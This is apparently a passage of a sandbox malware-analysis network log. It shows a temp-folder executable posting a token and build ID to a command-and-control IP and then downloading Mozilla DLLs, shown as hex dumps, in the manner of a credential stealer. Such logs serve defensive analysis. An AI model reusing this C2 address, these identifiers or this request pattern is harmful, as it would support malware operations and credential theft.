2024-07-26 10:57:26 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------CAFBGDHCBAEHIDGCGIDACont
2024-07-26 10:57:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	60807	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:28 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:28 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------BKFBAECBAEGDGDHIEHIJCont
2024-07-26 10:57:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:29 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	60809	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:29 UTC	241	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:30 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:29 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:29 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:30 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 Data Ascii: eUeLXee0@eeeue0UEeeUeee $
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
2024-07-26 10:57:30 UTC	16384	IN	Data Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	60812	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:31 UTC	241	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:32 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:31 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:31 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:32 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPF
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-07-26 10:57:32 UTC	16384	IN	Data Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
